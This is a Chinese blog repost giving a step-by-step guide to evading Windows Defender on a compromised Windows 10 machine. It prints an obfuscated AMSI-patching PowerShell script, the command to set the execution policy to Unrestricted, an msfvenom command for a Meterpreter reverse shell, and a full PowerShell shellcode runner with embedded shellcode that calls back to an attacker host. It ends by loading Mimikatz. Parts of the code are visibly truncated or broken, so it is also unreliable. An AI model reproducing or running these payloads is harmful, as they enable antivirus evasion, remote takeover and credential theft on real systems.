世界新资讯:绕过 Windows Defender (最新版本)

2023-01-25 20:16:31 来源:51CTO博客

在本文中,将绕过 Windows Defender(最新版本),并详细解释每个步骤。

准备

- Windows 10 机器(目标机)- 已获取目标机的低级特权帐户- Linux机器(攻击者)- Defender Anti-Virus 在发布本文时正在运行并且是最新的

Payload

Payload Runner:
[Ref].Assembly.GetType("System.Management.Automation.Amsi"+[char]85+"tils").GetField("ams"+[char]105+"InitFailed","NonPublic,Static").SetValue($null,$true)function LookupFunc {Param ($moduleName, $functionName)$assem = ([AppDomain]::CurrentDomain.GetAssemblies() |Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split("\\")[-1].Equals("System.dll") }).GetType("Microsoft.Win32.UnsafeNativeMethods")$tmp=@()$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}@($moduleName)), $functionName))}function getDelegateType {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,[Parameter(Position = 1)] [Type] $delType = [Void])$type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName("ReflectedDelegate")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule("InMemoryModule", $false).DefineType("MyDelegateType", "Class, Public, Sealed, AnsiClass, AutoClass",[System.MulticastDelegate])$type.DefineConstructor("RTSpecialName, HideBySig, Public",[System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags("Runtime, Managed")$type.DefineMethod("Invoke", "Public, HideBySig, NewSlot, Virtual", $delType, $func).SetImplementationFlags("Runtime, Managed")return $type.CreateType()}$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc),(getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x40)[Byte[]] $buf = [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)$hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread),(getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject),(getDelegateType @([IntPtr], [Int32])([Int]))).Invoke($hThread, 0xFFFFFFFF)
AMSI 绕过(Windows反恶意软件扫描接口)
$xudbk = @"using System;using System.Runtime.InteropServices;public class xudbk {[DllImport("kernel32")]public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);[DllImport("kernel32")]public static extern IntPtr LoadLibrary(string name);[DllImport("kernel32")]public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr pbsxld, uint flNewProtect, out uint lpflOldProtect);}"@Add-Type $xudbk$wvyfoqc = [xudbk]::LoadLibrary("$(("âmsì."+"dll").nOrMALIZe([cHAR](70)+[ChAR]([BYTE]0x6f)+[CHAr](114)+[ChAR]([byTe]0x6d)+[CHAR](68*12/12)) -replace [Char](92+19-19)+[cHar]([ByTe]0x70)+[cHaR](123+15-15)+[chAR](77)+[Char](110*102/102)+[cHar]([BytE]0x7d))")$dhdzwx = [xudbk]::GetProcAddress($wvyfoqc, "$(("ÁmsìScänBu"+"ffer").NorMAlIZE([chaR]([byTE]0x46)+[chAR](111)+[char]([Byte]0x72)+[chAR]([BYtE]0x6d)+[CHar]([byTE]0x44)) -replace [cHar]([BYTe]0x5c)+[CHAr](112)+[cHAR]([bytE]0x7b)+[char]([bytE]0x4d)+[ChAR](110)+[CHAR](125+4-4))")$p = 0[xudbk]::VirtualProtect($dhdzwx, [uint32]5, 0x40, [ref]$p)$qbzv = "0xB8"$dnyd = "0x57"$ttvz = "0x00"$xcoe = "0x07"$vslp = "0xC3"$dcios = [Byte[]] ($qbzv,$dnyd,$ttvz,$xcoe,+$dlsl,+$vslp)[System.Runtime.InteropServices.Marshal]::Copy($dcios, 0, $dhdzwx, 6)
执行策略绕过
Set-ExecutionPolicy Unrestricted -Scope CurrentUser
生成 Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -f powershell

前提

在目标机器上获取了一个低权限用户,目标机器正在使用 Windows Defender,所有保护措施都已到位,但下一步是执行多个脚本和枚举工具以找到特权升级向量,但 Windows Defender 阻止了所有尝试。


(资料图)

为此,必须找到一种规避技术,可以通过本文了解该技术。

绕过过程

绕过执行策略绕过反恶意软件扫描接口 (AMSI)生成有效载荷创建 PowerShell 运行程序执行 PowerShell Runner,启动最终有效负载

概念验证 (PoC)

我们将在"test"用户的上下文中工作,这是目标机器上的标准本地帐户。

另外,检查目标机器上的 Windows Defender 状态:

Windows Defender 是最新的并且在启用所有模块的情况下运行。

首先,我们将在目标的机器上打开一个 PowerShell 终端,并将执行策略设置为不受限制,使用以下命令:

Set-ExecutionPolicy Unrestricted -Scope CurrentUser

接下来,我们将检查反恶意软件扫描接口 (AMSI) 是否到位。如果你想了解更多关于 AMSI 的内容,可以查看windows官方文档 。使用以下命令检查 AMSI 是否正在运行:"amsiutils"

如果显示红色警告信息,则表示它运行正常。

接下来,我们将尝试通过将脚本(来自本文的"payload"部分)直接复制粘贴到我们的 PowerShell 控制台来绕过 AMSI:

$xudbk = @"using System;using System.Runtime.InteropServices;public class xudbk {[DllImport("kernel32")]public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);[DllImport("kernel32")]public static extern IntPtr LoadLibrary(string name);[DllImport("kernel32")]public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr pbsxld, uint flNewProtect, out uint lpflOldProtect);}"@Add-Type $xudbk$wvyfoqc = [xudbk]::LoadLibrary("$(("âmsì."+"dll").nOrMALIZe([cHAR](70)+[ChAR]([BYTE]0x6f)+[CHAr](114)+[ChAR]([byTe]0x6d)+[CHAR](68*12/12)) -replace [Char](92+19-19)+[cHar]([ByTe]0x70)+[cHaR](123+15-15)+[chAR](77)+[Char](110*102/102)+[cHar]([BytE]0x7d))")$dhdzwx = [xudbk]::GetProcAddress($wvyfoqc, "$(("ÁmsìScänBu"+"ffer").NorMAlIZE([chaR]([byTE]0x46)+[chAR](111)+[char]([Byte]0x72)+[chAR]([BYtE]0x6d)+[CHar]([byTE]0x44)) -replace [cHar]([BYTe]0x5c)+[CHAr](112)+[cHAR]([bytE]0x7b)+[char]([bytE]0x4d)+[ChAR](110)+[CHAR](125+4-4))")$p = 0[xudbk]::VirtualProtect($dhdzwx, [uint32]5, 0x40, [ref]$p)$qbzv = "0xB8"$dnyd = "0x57"$ttvz = "0x00"$xcoe = "0x07"$vslp = "0xC3"$dcios = [Byte[]] ($qbzv,$dnyd,$ttvz,$xcoe,+$dlsl,+$vslp)[System.Runtime.InteropServices.Marshal]::Copy($dcios, 0, $dhdzwx, 6)

再次执行 "amsiutils" ,你会看到红色警告不再显示,这表明AMSI 已被禁用。

现在使用 MSFVenom 在攻击机中生成一个 Meterpreter 有效负载。使用一个公共端口,例如 443,以绕过任何适当的防火墙规则,并可能避免生成任何警报。

我们将生成的有效载荷复制粘贴到我们的目标器中(可以在文章开头的"payload"部分找到),我们将得到最终版本:

[Ref].Assembly.GetType("System.Management.Automation.Amsi"+[char]85+"tils").GetField("ams"+[char]105+"InitFailed","NonPublic,Static").SetValue($null,$true)function LookupFunc {Param ($moduleName, $functionName)$assem = ([AppDomain]::CurrentDomain.GetAssemblies() |Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split("\\")[-1].Equals("System.dll") }).GetType("Microsoft.Win32.UnsafeNativeMethods")$tmp=@()$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}@($moduleName)), $functionName))}function getDelegateType {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,[Parameter(Position = 1)] [Type] $delType = [Void])$type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName("ReflectedDelegate")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule("InMemoryModule", $false).DefineType("MyDelegateType", "Class, Public, Sealed, AnsiClass, AutoClass",[System.MulticastDelegate])$type.DefineConstructor("RTSpecialName, HideBySig, Public",[System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags("Runtime, Managed")$type.DefineMethod("Invoke", "Public, HideBySig, NewSlot, Virtual", $delType, $func).SetImplementationFlags("Runtime, Managed")return $type.CreateType()}$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc),(getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x40)[Byte[]] $buf = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x51,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x56,0x4d,0x31,0xc9,0x48,0xf,0xb7,0x4a,0x4a,0x48,0x8b,0x72,0x50,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x8b,0x48,0x18,0x50,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x41,0x58,0x41,0x58,0x5e,0x59,0x48,0x1,0xd0,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x0,0x0,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x1,0x0,0x0,0x49,0x89,0xe5,0x49,0xbc,0x2,0x0,0x1,0xbb,0xc0,0xa8,0x3,0x4,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x7,0xff,0xd5,0x4c,0x89,0xea,0x68,0x1,0x1,0x0,0x0,0x59,0x41,0xba,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x0,0x0,0x0,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x4,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x0,0x10,0x0,0x0,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x0,0x40,0x0,0x0,0x41,0x58,0x6a,0x0,0x5a,0x41,0xba,0xb,0x2f,0xf,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x1,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x0,0x59,0xbb,0xe0,0x1d,0x2a,0xa,0x41,0x89,0xda,0xff,0xd5[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)$hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread),(getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject),(getDelegateType @([IntPtr], [Int32])([Int]))).Invoke($hThread, 0xFFFFFFFF)

我们将使用 Metasploit 在攻击机中启动我们的侦听器。

最后,让我们将运行程序直接复制粘贴到受害者机器的 PowerShell 控制台中。

查看handler

拿到shell !!!

只需 5 个简单的步骤,我们就能够在所有模块都启动并运行的情况下绕过 Windows Defender。

让我们尝试在我们的 meterpreter shell 中运行 Mimikatz(通常会立即被 Defender 拒绝)。

load 成功!

关注公众号,内容更精彩:

标签: 恶意软件 运行程序 的情况下

上一篇:天天热点!【学懂Java】(六)常用类
下一篇:Tableau完整系列课程4:Tableau desktop图表制作系列专题